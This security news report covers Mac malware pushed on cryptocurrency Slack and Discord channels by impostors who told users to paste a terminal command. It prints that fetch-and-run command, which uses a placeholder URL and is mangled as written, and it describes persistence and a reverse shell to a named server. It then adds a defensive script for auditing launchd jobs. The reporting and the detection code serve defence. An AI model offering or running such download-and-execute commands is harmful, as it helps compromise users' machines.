Security researchers have spotted a new Mac malware family that's currently being advertised on cryptocurrency-focused Slack and Discord channels.

The malware's existence came to light last week when it was discovered by Remco Verhoef, an ISC SANS handler and founder of DutchSec.

Verhoef says he spotted crooks, posing as admins, mods, or other key figures in the cryptocurrency world, posting messages that urged users to type a long command inside their Mac terminal, claiming to help with various problems.

The command (see below) downloaded a hefty 34 MB binary named "script" to the /tmp folder and then ran it as root.

```
cd /tmp & curl -s curl $MALICIOUS_URL > script & chmod +x script &.
```

Malware creates backdoor on infected systems

The "script" file then sets itself as a launch daemon to gain persistence between OS reboots and then creates a Python script that opens a reverse shell to a server located at 185.243.115.230:1337.
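A defender-side check for the persistence step described above, as an added example that is not from the original article: it parses launchd job definitions and flags any that run a file from a user-writable directory such as /tmp or that mention the reported server. The directory list, the function name and both sample plists are assumptions constructed for illustration.

```python
import glob
import plistlib

# Locations any local user can write to (assumed list; extend for your fleet).
WRITABLE_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
REPORTED_HOST = "185.243.115.230"  # reverse-shell server named in the article

def audit_launchd_job(raw: bytes) -> list:
    """Return findings for one launchd job definition (XML or binary plist)."""
    try:
        job = plistlib.loads(raw)
    except Exception:
        return ["unparseable plist"]
    if not isinstance(job, dict):
        return ["top-level object is not a dictionary"]
    args = job.get("ProgramArguments") or []
    words = [str(a) for a in (args if isinstance(args, list) else [args])]
    if job.get("Program"):  # Program, when set, is the executable launchd runs
        words.insert(0, str(job["Program"]))
    findings = []
    for word in words:
        if word.startswith(WRITABLE_DIRS):
            findings.append("runs file from user-writable path: " + word)
        if REPORTED_HOST in word:
            findings.append("references reported server: " + word)
    if findings and (job.get("RunAtLoad") or job.get("KeepAlive")):
        findings.append("job starts automatically, so it survives reboots")
    return findings

# Constructed samples, not taken from the malware itself.
SUSPICIOUS = plistlib.dumps({
    "Label": "com.example.constructed",
    "ProgramArguments": ["/bin/sh", "/tmp/script"],
    "RunAtLoad": True,
})
BENIGN = plistlib.dumps({
    "Label": "com.example.benign",
    "ProgramArguments": ["/usr/sbin/cupsd", "-l"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    # On a Mac, system-wide daemons live in /Library/LaunchDaemons.
    for path in sorted(glob.glob("/Library/LaunchDaemons/*.plist")):
        with open(path, "rb") as fh:
            for finding in audit_launchd_job(fh.read()):
                print(path + ": " + finding)
```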